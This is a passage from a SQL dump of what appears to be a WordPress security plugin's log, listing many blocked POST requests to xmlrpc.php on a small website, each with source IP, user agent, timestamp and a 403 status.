Firefox\\/33.0\"}','5X32p8o7CtmnqubRNHPL04OD',0,1681745233.2572,635,'','POST',403,0,515,0,1,'',0),('187.1.136.128',3137439872,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','i2hADpCGE9I1rmPtJzV4ZKjU',0,1681745236.2747,911,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','niqKJpFVEMkXrxSR0fC7joeA',0,1681745236.8555,825,'','POST',403,0,515,0,1,'',0),('81.88.53.58',1364735290,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','eiv613Bfm0RzCZNqsYlWgwbu',0,1681745249.1631,2099,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','xZTh1Gl7zQ0E5oRfsNBY92cJ',0,1681745249.5453,2023,'','POST',403,0,515,0,1,'',0),('184.75.214.163',3091977891,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ER7Ft3BiMlIgKCvbQ0XAqVLa',0,1681746569.7777,3473,'','POST',403,0,515,0,1,'',0),('134.19.179.139',2249438091,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Hk80IQbrlhOuCMS1WDLmxd6Z',0,1681747102.8584,3671,'','POST',403,0,515,0,1,'',0),('185.200.116.131',3116921987,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7OvAgVCXPoNEflHbpFr9cx8y',0,1681752386.4736,4559,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','odrbJXas8xt2PiRfmZkp5G3L',0,1681752397.5931,3046,'','POST',403,0,515,0,1,'',0),('108.170.55.202',1823094730,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','9mf5C3MeSIV6Yncjgi2UxhHb',0,1681752402.8447,2800,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','YqoE5QwcXZ4TW2VC36BNDPbK',0,1681752413.7830,656,'','POST',403,0,515,0,1,'',0),('51.161.94.36',866213412,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','DmQ4LWlNyp7AMX9qbeIVaJ2R',0,1681752416.5546,568,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','NIwdDX97FuUSepHOB6mgrjAn',0,1681752423.1312,828,'','POST',403,0,515,0,1,'',0),('140.83.54.43',2354263595,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','VH17cx8GqkQ2bRr9mClvAhLf',0,1681752423.8407,659,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','MBpYtLxj9T1KlACe0Huw4dra',0,1681752432.6791,1400,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','DhSvfwrE0n4edAPztLFXOicW',0,1681752432.9798,1276,'','POST',403,0,515,0,1,'',0),('144.126.132.168',2424210600,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','u6EcDoUPyliIj3esOb5XQLtn',0,1681752438.8017,679,'','POST',403,0,515,0,1,'',0),('62.102.148.154',1046910106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XBCu2QWvqYSRwDIkLryzjAd0',0,1681752852.0717,4086,'','POST',403,0,515,0,1,'',0),('185.21.40.38',3105171494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','14KgtIB5YiuXakONWVUCnQlm',0,1681758464.4148,614,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','kXtjGde4gm7hNr3pUE5wVYx1',0,1681758465.3290,593,'','POST',403,0,515,0,1,'',0),('91.192.164.15',1539351567,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','pDO5jvnCsGh6eB4xEJkfRruM',0,1681758469.0318,609,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','PejKimCNt9psSh5JV1yFUXb7',0,1681758471.7405,655,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','pXo2STKnfZHJVtc4yDCMIigO',0,1681758482.4366,667,'','POST',403,0,515,0,1,'',0),('88.214.28.5',1490426885,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','3QNUWqbXPYHjocmK6VEMs1Bw',0,1681758486.2339,649,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','URwltyI7Nf26ZOxapCAj1gXu',0,1681758489.9101,762,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','mI65fbLYoUNgP3i7RCzpwQjc',0,1681758491.2804,606,'','POST',403,0,515,0,1,'',0),('194.65.141.201',3259076041,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','KqTu1p6gv7dVeOnGM3wtkca4',0,1681758690.9933,3732,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','btO7M09UcFWdl4Y2G8uxoTjw',0,1681758698.1918,670,'','POST',403,0,515,0,1,'',0),('47.242.255.46',804454190,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','K4oa8unhs6bmdtGi2FTfxVEZ',0,1681758706.4296,572,'','POST',403,0,515,0,1,'',0),('139.59.25.27',2335906075,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','eDfk4mCSWpGtvhF5BMP3jyc9',0,1681759390.6726,4872,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','rfw4Sq5HjcbCgtAKaBFhZvz8',0,1681759394.3915,2148,'','POST',403,0,515,0,1,'',0),('101.32.190.143',1696644751,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','7UWKzaerw0cTA423pO1SYELl',0,1681759404.9432,846,'','POST',403,0,515,0,1,'',0),('185.253.215.16',3120420624,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','3MskD7R2ZFGKgJLwT84Ebn6t',0,1681759413.5976,659,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','umiQ4sezgA96rUx2IGo35LE0',0,1681759421.6621,661,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','scMOfPNXDhu3SYArdEV0U9Ba',0,1681762712.3242,1242,'','POST',403,0,515,0,1,'',0),('47.103.26.229',795286245,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','QuotZgRTAw41GjJMDLv3Hefc',0,1681762712.6749,1124,'','POST',403,0,515,0,1,'',0),('64.91.226.29',1079763485,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','xt2XKW7ugAMJT1UpVFQYckiz',0,1681762717.7725,641,'','POST',403,0,515,0,1,'',0),('45.150.149.86',764843350,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','0ak6yfimZRGoOFHs9ew4MCWz',0,1681762723.7871,583,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','DXGyjF5w7gflZEHxqrY3WdOI',0,1681762726.2695,881,'','POST',403,0,515,0,1,'',0),('103.82.27.150',1733434262,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','2Ykygh1dHbUq3PcLt8EDm7B5',0,1681762727.0726,672,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','Qj2DZHqzT9Xc15hdws7WFb8u',0,1681762732.5140,579,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','WMboQl5EjrGye81VxdmN3CtD',0,1681762738.2277,610,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','pQfTPyZosW6EA8d4OnLFB5xk',0,1681762745.1417,562,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','OfonMhRl1vIu6VPdqwGpA2Yr',0,1681762798.5234,1352,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','dYXQS2jH9sgZCtxaiuolTBK4',0,1681762801.3553,628,'','POST',403,0,515,0,1,'',0),('139.162.58.251',2342664955,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','dkJHBFj0peGVSPDCUtv2unxh',0,1681762802.6956,853,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','REzApMPr1NwnF3YsLO07DGuf',0,1681762807.4810,703,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','M8pkaiCbjFYJAylo9KR3d6uN',0,1681762808.6388,622,'','POST',403,0,515,0,1,'',0),('47.96.4.39',794821671,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','Xp59JLdZvCa30OobPVtUTGxj',0,1681762812.2990,598,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','0WhUjGHKQt7M1fSCr5JI9kYN',0,1681762816.0589,624,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','HvYzXuASgLGaniN8Zec3J5fx',0,1681762819.5579,589,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','1UtO4YDJrd356jkQqAm9hTM8',0,1681762821.3792,593,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','82NyhKtJfCFuzTmBa6xZiMsb',0,1681762831.4103,632,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','qgIPHraTAxt2XJe9lv0iNSjW',0,1681762833.2674,564,'','POST',403,0,515,0,1,'',0),('213.159.7.167',3583969191,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','NpiSe76jZzDwFxPgdqMa21X9',0,1681762838.8876,549,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','ls4KVETa2fdNz8LeGRUwqkJO',0,1681766934.3141,568,'','POST',403,0,515,0,1,'',0),('5.39.4.40',86443048,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','eg2zo1PxQbBTEYLyXi4kFOHr',0,1681766936.0365,1080,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','WTfPAQZ4VzoY2Oc1wC5J3uSi',0,1681766952.5995,611,'','POST',403,0,515,0,1,'',0),('202.172.26.49',3400276529,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','AY9qabxIDTchdjerk3P2zRGw',0,1681768250.5902,4356,'','POST',403,0,515,0,1,'',0),('54.37.84.217',908416217,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','oJTwpmuLS4Wg37txdFq8AnXP',0,1681768249.6265,5320,'','POST',403,0,515,0,1,'',0),('185.227.134.226',3118696162,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Yu7iK5PHFXthRmf02lA1Dxj9',0,1681768257.8559,618,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','oJly36nuzvMf2S9AQxZNVOdE',0,1681768258.9666,567,'','POST',403,0,515,0,1,'',0),('209.58.183.78',3510286158,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zLZCqupQkKHf5Tyn1xVEAaeo',0,1681768526.9326,3563,'','POST',403,0,515,0,1,'',0),('62.171.133.125',1051428221,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','4wXjYCGyh1dDxIo9EQ53RkeV',0,1681771114.1481,2097,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','E6f3YxnDqOpw8bvJrdhylPKa',0,1681771110.8312,5416,'','POST',403,0,515,0,1,'',0),('101.32.41.71',1696606535,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','kT62GuILJd3elvFa1Ry9N4bW',0,1681771116.2674,965,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','xJH5zfn3Li6mIh4o0Cet2gyu',0,1681771120.6933,565,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','RYnpXq5wGBDNkIdhsMO98Z6g',0,1681771134.9440,611,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','lcAiH4pQgPXK5dxqkVjFJzBW',0,1681771138.6465,578,'','POST',403,0,515,0,1,'',0),('82.16.21.137',1376785801,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','xhbk4zi60VgAGmpD7TCq5XQn',0,1681771144.1466,570,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','dnINhWCtk56U2bv79iZMwfXl',0,1681771148.6048,741,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','KObuhYsrcDweHq5192SLmB6J',0,1681771149.2787,651,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','XRF2v5ILKUE6Q4BTPd9Y1ZOm',0,1681780676.1455,1309,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','oztIZ34NTKXqdyDjxL1GpmHs',0,1681780676.1475,1447,'','POST',403,0,515,0,1,'',0),('144.208.66.87',2429567575,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','ZY6i0gtUDKk2I8uRJNMPLslx',0,1681780679.0741,563,'','POST',403,0,515,0,1,'',0),('146.70.76.43',2454080555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FZAglEhCzfHL5s1cRMNjvxG2',0,1681781210.8385,20419,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','zM5bfAkvLjHd6w3T0N8R7yXa',0,1681786329.8383,596,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','qfA6v2hToNW1mKl3Du0OcgZi',0,1681786341.1615,596,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','pO28xbRKTI0gPrn9jLo3dt1l',0,1681786344.5452,819,'','POST',403,0,515,0,1,'',0),('5.39.4.40',86443048,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','5Vt9CWQh6vaYFe0bDmOHxU8K',0,1681786349.0850,604,'','POST',403,0,515,0,1,'',0),('167.86.123.58',2807462714,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','dgAOLcbKWwayqYuU0s1GFpM5',0,1681790743.9259,615,'','POST',403,0,515,0,1,'',0),('91.204.46.73',1540107849,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','LIkhDtQb48Srd2aAsMOvpKBi',0,1681790744.9497,1229,'','POST',403,0,515,0,1,'',0),('52.47.152.252',875534588,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 